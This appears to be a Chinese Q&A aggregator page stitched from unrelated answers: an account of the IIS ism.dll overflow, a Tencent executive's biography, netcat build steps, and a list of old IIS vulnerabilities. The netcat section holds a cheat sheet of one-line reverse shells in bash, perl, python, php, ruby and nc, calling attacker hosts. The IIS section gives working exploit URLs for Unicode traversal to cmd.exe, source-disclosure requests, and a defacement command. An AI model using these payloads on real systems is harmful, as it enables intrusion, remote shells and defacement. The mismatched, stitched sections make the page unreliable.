netcat源碼
① 如何攻擊伺服器
Web伺服器將成為下一代黑客施展妖術的對象。在很大程度上,進行這種攻擊只需一個Web瀏覽器和一個創造性的頭腦。以前,黑客的攻擊對象集中在操作系統和網路協議上,但隨著這些攻擊目標的弱點和漏洞逐漸得到修補,要進行這類攻擊已經變得非常困難。操作系統正在變得更加穩健,對攻擊的抵抗能力日益提高。隨著身份驗證和加密功能漸漸被內置到網路協議中,網路協議也變得更加安全。此外,防火牆也越來越智能,成為網路和系統的外部保護屏障。
另一方面,電子商務技術正在日益普及開來,其復雜性有增無減。基於Web的應用程序正在與基本的操作系統和後端資料庫更加緊密地集成在一起。遺憾的是,人們在基於Web的基礎設施安全性方面所做的工作還很不夠。Web伺服器和Web應用程序中的弱點被發現的速度為何這么快呢?
有很多因素促成了這種Web黑客活動的快速增加。其中最主要的原因是防火牆允許所有的Web通信都可以進出網路,而防火牆無法防止對Web伺服器程序及其組件或Web應用程序的攻擊。第二個原因是,Web伺服器和基於Web的應用程序有時是在「功能第一,安全其次」的思想指導下開發出來的。
當您的Web伺服器面臨巨大威脅時,怎樣保障它們的安全呢?這就需要您不斷了解新信息,新情況,每天跟蹤您所用伺服器的有關網站,閱讀相關新聞並向它進行咨詢。為了讓你著手這方面的工作,下面介紹黑客對NT系統的四種常用攻擊手段,同時介紹如何防止這類攻擊。
Microsoft IIS ism.dll緩沖區溢出受影響的伺服器:運行IIS 4.0並帶有「Service Pack 3/4/5」的Windows NT伺服器MicrosoftIIS緩沖區溢出這一安全弱點是Web伺服器無時不有的重大缺陷之一。該弱點被稱為IIS eEye,這個名稱來自發現此問題的一個小組。在實施緩沖區溢出攻擊時,黑客向目標程序或服務輸入超出程序處理能力的數據,導致程序突然終止。另外,還可以通過設置,在執行中的程序終止運行前,用輸入的內容來覆蓋此程序的某些部分,這樣就可以在伺服器的安全許可權環境下執行任意黑客命令。
eEye發現,IIS用來解釋HTR文件的解釋程序是ism.dll,它對緩沖區溢出攻擊的抵抗力十分脆弱。如果攻擊者將一個以.htr結尾的超長文件名(大約3,000個字元,或更多)傳遞給IIS,那麼輸入值將在ism.dll中造成輸入緩沖區溢出,並導致IIS崩潰。如果攻擊者輸入的不是一串字母而是可執行代碼(通常稱為「雞蛋」或「外殼代碼」),那麼在IIS終止之前將執行該代碼。由eEye小組發現的這一攻擊方法
包括三個步驟:
1.創建一個用於偵聽任意TCP埠上連接活動的程序。一旦接收到連接信號,該程序將執行一個Windows命令外殼程序(cmd.exe),並將該外殼與連接綁定在一起。這個程序是經過修改的Netcat。Netcat是一個流行的網路連接實用程序,其源代碼可以免費獲得。
2.在IIS的ism.dll中製造緩沖區溢出,並使IIS從外部Web站點下載偵聽程序(由步驟1產生)。
3.執行剛下載的程序(由步驟2產生),該程序將等待傳入的連接並使攻擊者進入Windows命令外殼程序中。
由於緩沖區溢出導致IIS在崩潰之前轉而運行Windows命令外殼,所以該外殼程序將在IIS的安全許可權背景下運行,而該安全許可權背景等價於NT Administrator許可權。這樣,攻擊者要做的只是與被攻擊的IIS伺服器的偵聽埠建立連接,然後等著出現c:>提示就萬事大吉了。現在,攻擊者擁有對整個NT伺服器的管理許可權,可以做任何事,比如,添加新用戶、修改伺服器的內容、格式化驅動器,甚至將該伺服器用作攻擊其它系統的踏腳石。
運行IIS 4.0並帶有「Service Pack 3/4/5」的Windows NT伺服器容易受到此類攻擊。Microsoft已經發布了對該弱點的修補程序。Windows NT Service Pack 6也已經修補了該問題。
② 誰知道騰訊公司的高層都有誰
1、許晨曄
1996年取得南京大學計算機應用碩士學位。騰訊公司首席信息官。許先生是主要創辦人之一,自1999年起受雇於騰訊,全面負責網站財產和社區、客戶關系及公共關系的策略規劃和發展工作。
出任現職前,許先生曾在深圳數據通信局任職,累積豐富軟體系統設計、網路管理和市場推廣及銷售管理經驗。
③ linux怎麼安裝netcat
etcat-0.7.1.tar.gz
然後當然是解壓了
tar zxvf netcat-0.7.1.tar.gz
解壓完畢之後會生成目錄,要cd進去
cd netcat-0.7.1
然後進行編譯前的配置。
./configure
配置完了之後就可以make編譯了。
編譯成功就生成了netcat可執行的文件了,位於src目錄,cd進去進行運行./netcat -h.如圖
本地Windows監聽
nc -vv -l -p 1234
遠程Windows轉發
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
遠程Linux轉發
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
———————NetCat for linux 參數e————————-
下載netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句話反彈命令
[Bash]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
[PERL]
perl -e 『use Socket;$i=」10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(「tcp」));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,」>&S」);open(STDOUT,」>&S」);open(STDERR,」>&S」);exec(「/bin/sh -i」);};』
[python]
python -c 『import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((「10.0.0.1″,1234));os.p2(s.fileno(),0); os.p2(s.fileno(),1); os.p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);』
[PHP]
php -r 『$sock=fsockopen(「10.0.0.1″,1234);exec(「/bin/sh -i <&3 >&3 2>&3″);』
[Ruby]
ruby -rsocket -e』f=TCPSocket.open(「10.0.0.1″,1234).to_i;exec sprintf(「/bin/sh -i <&%d >&%d 2>&%d」,f,f,f)』
[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
④ 常見的網路漏洞有哪些
你說的漏洞比較廣,是軟體漏洞還是系統 系統漏洞還有server漏洞還有iis漏洞 我就和你說說iis漏洞吧。1. iis4hack緩沖溢出
主要存在於.htr,.idc和.stm文件中,其對關於這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些後門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一台自己的WEB伺服器。你現在你自己的WEB伺服器上運行WEB服務程序並把ncx.exe放到你自己相應的目錄下,然後使用iishack.exe來檢查目標機器:
c:>iishack.exe <victim> 80 <your web server>/ncx.exe
然後你就使用netcat來連接你要檢測的伺服器:
c:>nc <victim> 80
如果溢出點正確你就可以看到目標機器的命令行提示,並且是管理遠許可權。利用程序見iis4hack.zip
2.msadc
IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在於RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS伺服器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = mp Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h http://www.targe.com/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出現cmd /c後,直接鍵入命令行,就可以以system許可權執行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
察看文件源代碼
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
4.Showcode.asp
察看文件源代碼
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
5.Null.htw
察看文件源代碼
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
6.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變數CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件並返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:
http://www.victim.com/nosuchfile.htw 如果你從伺服器端獲得如下信息:
format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消
這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)
一個攻擊者可以使用如下的方法來訪問系統中文件的內容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼
8.ASP Dot Bug
在請求的URL結尾追加一個或者多個點導致泄露ASP源代碼。
http://www.victim.com/sample.asp.
9.ISM.DLL
這個漏洞是由Cerberus Information Security team.最早發現的,它運行在IIS4.0和5.0上面,允許攻擊者查看任意文件內容和源代碼。通過在文件名後面追加近230個+或者?%20?(這些表示空格)並追加?.htr?的特殊請求給IIS,會使IIS認為客戶端請求的是?.htr?文件,而.htr文件的後綴映射到ISM.DLL ISAPI應用程序,這樣IIS就把這個.htr請求轉交給這個DLL文件,然後ISM.DLL 程序把傳遞過來的文件打開和執行,但在ISM.DLL 截斷信息之前,緩沖區發送 一個截斷開的 .Htr 並會有一些時間去返回一些你要打開的文件內容. 除非 WEB 服務停止並重啟過,否則這攻擊只能有效執行一次。如果已經發送過一個 .htr 請求到機器上,那麼這攻擊會失效.它只能在 ISM.DLL第一次裝入內存時工作.CNNS發現追加+號到沒有一次攻擊這個問題,可以進行多次攻擊。
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
10. .idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪的說有些還在IIS5.0上發現過此類漏洞,通過增加?idc?或者?ida? 後綴到URL會導致IIS嘗試允許通過資料庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.victim.com/anything.idc 或者 anything.idq
11.+.htr Bug
對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的泄露:
http://www.victim.com/global.asa+.htr
12.NT Site Server Adsamples
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者 可能獲得一些如資料庫中的DSN,UID和PASS的一些信息,如:
http://www.victim.com/adsamples/config/site.csc
13./iisadmpwd
IIS4.0中包含一個有趣的特徵就是允許遠程用戶攻擊WEB伺服器上的用戶帳號,就是你的WEB伺服器是通過NAT來轉換地址的,還可以被攻擊。 每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個 .htr文件,匿名用戶允許訪問這些文件,這些文件剛好沒有規定只限制 在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳號和密碼。這個目錄物理映射在下面的目錄下:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
這樣,攻擊者可以通過暴力來猜測你的密碼。
14.Translate:f Bug
泄露asp文件源代碼 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 當有人請求一個ASP/ASA後者其他任意腳本的時候在HTTP GET加上Translate:f 後綴,並在請求文件後面加/就會顯示文件代碼,當然在沒有打WIN2K SP1補丁 為前提。這個是W2K的漏洞,但由於FP2000也安裝在IIS4.0上,所以在IIS4.0上也有這個漏洞。利用程序: trasn1.pl,trans2.pl
15.Unicode
IIS 4.0和IIS 5.0在Unicode字元解碼的實現中存在一個安全漏洞,導致用戶可以遠程通過IIS執行任意命令。當IIS打開文件時,如果該文件名包含unicode字元,它會對其進行解碼,如果用戶提供一些特殊 的編碼,將導致IIS錯誤的打開或者執行某些web根目錄以外的文件。
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
可能需要察看以下幾個目錄
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
eeye開發了工具包iishack1.5針對這一漏洞進行測試
16.iis5.0 緩沖溢出
微軟Win 2K IIS
5的列印ISAPI擴展介面建立了.printer擴展名到msw3prt.dll的映射關系,預設情況下該映射存在。當遠程用戶提交對.printer的URL請求時,IIS
5調用msw3prt.dll解釋該請求。由於msw3prt.dll缺乏足夠的緩沖區邊界檢查,遠程用戶可以提交一個精心構造的針對.printer的URL請求,其"Host:"域包含大約420位元組的數據,此時在msw3prt.dll中發生典型的緩沖區溢出,潛在允許執行任意代碼。溢出發生後,WEB服務停止響應,Win 2K可以檢查到WEB服務停止響應,從而自動重啟它,因此系統管理員很難意識到發生過攻擊。利用程序見iis5hack.zip
17.IIS CGI文件名二次解碼漏洞
IIS在載入可執行CGI程序時,會進行兩次解碼。第一次解碼是對CGI文件名進行http解碼,然後判斷此文件名是否為可執行文件,例如檢查後綴名是否為".exe"或".com"等等。在文件名檢查通過之後,IIS會再進行第二次解碼。正常情況下,應該只對該CGI的參數進行解碼,然而,IIS錯誤地將已經解碼過的CGI文件名和CGI參數一起進行解碼。這樣,CGI文件名就被錯誤地解碼了兩次。
通過精心構造CGI文件名,攻擊者可以繞過IIS對文件名所作的安全檢查,例如對"../"或"./"的檢查,在某些條件下,攻擊者可以執行任意系統命令。
例如,對於』』這個字元,正常編碼後是%5c。這三個字元對應的編碼為:
』%』 = %25
』5』 = %35
』c』 = %63
如果要對這三個字元再做一次編碼,就可以有多種形式,例如:
%255c
%%35c
%%35%63
%25%35%63
...
因此,".."就可以表示成"..%255c"或"..%%35c"等等形式。在經過第一次解碼之後,變成"..%5c"。IIS會認為這是一個正常的字元串,不會違反安全規則檢查。而在第二次被解碼之後,就會變成".."。因此攻擊者就可以使用".."來進行目錄遍歷,執行web目錄之外的任意程序。 好了 先到這里。。。。漏洞太多了不過還是微軟系統排第一的 一個是使用的人群廣 一個是XXX 哈哈哈